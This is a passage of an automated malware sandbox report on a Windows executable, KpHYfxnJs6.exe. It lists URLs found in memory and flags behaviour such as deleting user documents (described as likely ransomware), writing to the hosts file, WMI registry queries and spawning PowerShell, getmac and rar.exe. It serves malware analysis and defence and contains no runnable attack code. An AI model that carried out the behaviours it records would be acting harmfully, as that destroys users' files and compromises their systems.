              Source: KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: KpHYfxnJs6.exe, 00000004.00000002.2891396339.00000000079D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: KpHYfxnJs6.exe, 00000004.00000002.2894515812.0000000007E50000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2652791310.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2651924922.0000000007A33000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: KpHYfxnJs6.exe, 00000004.00000003.2620928135.0000000007A67000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621699329.0000000007524000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621699329.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617501085.0000000007A67000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2616436229.0000000007524000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2636804800.000000000754F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: KpHYfxnJs6.exe, 00000004.00000003.2651924922.0000000007A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: KpHYfxnJs6.exe, 00000004.00000003.2621699329.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2620928135.0000000007A67000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617501085.0000000007A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: KpHYfxnJs6.exe, 00000004.00000003.2651924922.0000000007A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: KpHYfxnJs6.exe, 00000004.00000003.2620928135.0000000007A67000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617501085.0000000007A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: KpHYfxnJs6.exe, 00000004.00000003.2651924922.0000000007A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: KpHYfxnJs6.exe, 00000004.00000003.2620928135.0000000007A67000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2651924922.0000000007A42000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617501085.0000000007A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2623954278.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617408456.0000000007672000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007672000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2636804800.000000000759F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: KpHYfxnJs6.exe, 00000004.00000003.2652879260.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684053799.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621368120.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: KpHYfxnJs6.exe, 00000004.00000003.2651924922.0000000007A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: KpHYfxnJs6.exe, 00000004.00000003.2679930473.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684913468.0000000009830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: KpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2897045196.000000006BF0F000.00000004.00000001.01000000.00000012.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2897932299.000000006C159000.00000004.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: KpHYfxnJs6.exe, 00000004.00000003.2461660455.0000000004E53000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2461744604.0000000004E47000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2461580461.0000000004E47000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2885247505.0000000007240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898642505.000000006C67B000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2484058044.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886740253.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621613704.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484185809.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880087065.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674550956.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485343382.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743962657.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2677988442.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2652879260.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484414365.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684053799.0000000007628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: KpHYfxnJs6.exe, 00000004.00000002.2891396339.00000000079D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: KpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: KpHYfxnJs6.exe, 00000004.00000003.2603116149.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884329550.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881336814.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744996096.0000000004E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
              Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Modifies existing user documents (likely ransomware behavior)
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? \Common Files\Desktop\KATAXZVCPS.pngJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? \Common Files\Desktop\XZXHAVGRAG.docxJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? \Common Files\Desktop\LTKMYBSEYZ.xlsxJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? \Common Files\Desktop\KZWFNRXYKI.mp3Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? \Common Files\Desktop\KZWFNRXYKI.pdfJump to behavior
              Modifies the hosts file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: cmd.exeProcess created: 79

              System Summary

              barindex
              PE file contains section with special chars
              Source: KpHYfxnJs6.exeStatic PE information: section name:
              Source: KpHYfxnJs6.exeStatic PE information: section name:
              Source: KpHYfxnJs6.exeStatic PE information: section name:
              Source: KpHYfxnJs6.exeStatic PE information: section name:
              Source: KpHYfxnJs6.exeStatic PE information: section name:
              Writes or reads registry keys via WMI
              Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA43A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,109_2_00007FF6FAA43A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA6B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,109_2_00007FF6FAA6B57C
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_0767AF634_3_0767AF63
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_0767AF634_3_0767AF63
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_0767837F4_3_0767837F
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_076781F74_3_076781F7
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_0767AF634_3_0767AF63
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_0767AF634_3_0767AF63
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_0767837F4_3_0767837F
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_076781F74_3_076781F7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_04E2B56014_2_04E2B560
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_04E2B55114_2_04E2B551
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_08EB3A0814_2_08EB3A08
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 70_2_041E707070_2_041E7070
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 70_2_041E708070_2_041E7080
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 70_2_07E1196770_2_07E11967
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 70_2_07E1196870_2_07E11968
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA2ABA0109_2_00007FF6FAA2ABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA30A2C109_2_00007FF6FAA30A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA57B24109_2_00007FF6FAA57B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA4AE10109_2_00007FF6FAA4AE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA354C0109_2_00007FF6FAA354C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA31180109_2_00007FF6FAA31180
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA282F0109_2_00007FF6FAA282F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA21884109_2_00007FF6FAA21884
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA2B540109_2_00007FF6FAA2B540
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA38C30109_2_00007FF6FAA38C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA64B38109_2_00007FF6FAA64B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA79B98109_2_00007FF6FAA79B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA50D20109_2_00007FF6FAA50D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA76D0C109_2_00007FF6FAA76D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA49D0C109_2_00007FF6FAA49D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA2DD04109_2_00007FF6FAA2DD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA65C8C109_2_00007FF6FAA65C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA249B8109_2_00007FF6FAA249B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA669FD109_2_00007FF6FAA669FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA4D97C109_2_00007FF6FAA4D97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA8AAC0109_2_00007FF6FAA8AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA2CB14109_2_00007FF6FAA2CB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA5FA6C109_2_00007FF6FAA5FA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA65A70109_2_00007FF6FAA65A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA64FE8109_2_00007FF6FAA64FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA8DFD8109_2_00007FF6FAA8DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA33030109_2_00007FF6FAA33030
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA5C00C109_2_00007FF6FAA5C00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA55F4C109_2_00007FF6FAA55F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA8AF90109_2_00007FF6FAA8AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA800F0109_2_00007FF6FAA800F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA40104109_2_00007FF6FAA40104
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA50074109_2_00007FF6FAA50074
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA4C05C109_2_00007FF6FAA4C05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA58040109_2_00007FF6FAA58040
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA71DCC109_2_00007FF6FAA71DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA2EE08109_2_00007FF6FAA2EE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA31E04109_2_00007FF6FAA31E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA69D74109_2_00007FF6FAA69D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA5AF0C109_2_00007FF6FAA5AF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA29EFC109_2_00007FF6FAA29EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA38E68109_2_00007FF6FAA38E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA7FE74109_2_00007FF6FAA7FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA6AE50109_2_00007FF6FAA6AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA6EEA4109_2_00007FF6FAA6EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA2CE84109_2_00007FF6FAA2CE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA4C3E0109_2_00007FF6FAA4C3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA50374109_2_00007FF6FAA50374
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA32360109_2_00007FF6FAA32360
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA2A504109_2_00007FF6FAA2A504
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA65468109_2_00007FF6FAA65468
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA4D458109_2_00007FF6FAA4D458
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA681CC109_2_00007FF6FAA681CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA841CC109_2_00007FF6FAA841CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA3E21C109_2_00007FF6FAA3E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA62164109_2_00007FF6FAA62164
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA242E0109_2_00007FF6FAA242E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA3D2C0109_2_00007FF6FAA3D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA7832C109_2_00007FF6FAA7832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA71314109_2_00007FF6FAA71314
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA72268109_2_00007FF6FAA72268
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA2F24C109_2_00007FF6FAA2F24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA47244109_2_00007FF6FAA47244
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA602A4109_2_00007FF6FAA602A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA467E0109_2_00007FF6FAA467E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA317C8109_2_00007FF6FAA317C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA538E8109_2_00007FF6FAA538E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA5D91C109_2_00007FF6FAA5D91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA6190C109_2_00007FF6FAA6190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA50904109_2_00007FF6FAA50904
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA718A8109_2_00007FF6FAA718A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA32890109_2_00007FF6FAA32890
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA28884109_2_00007FF6FAA28884
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA7260C109_2_00007FF6FAA7260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA565FC109_2_00007FF6FAA565FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA4F5B0109_2_00007FF6FAA4F5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA38598109_2_00007FF6FAA38598
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA5F59C109_2_00007FF6FAA5F59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA886D4109_2_00007FF6FAA886D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA386C4109_2_00007FF6FAA386C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA5A710109_2_00007FF6FAA5A710
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA60710109_2_00007FF6FAA60710
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA62700109_2_00007FF6FAA62700
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA77660109_2_00007FF6FAA77660
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: String function: 00007FF6FAA649F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: String function: 00007FF6FAA38444 appears 48 times
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: KpHYfxnJs6.exeBinary or memory string: OriginalFilename vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs KpHYfxnJs6.exe
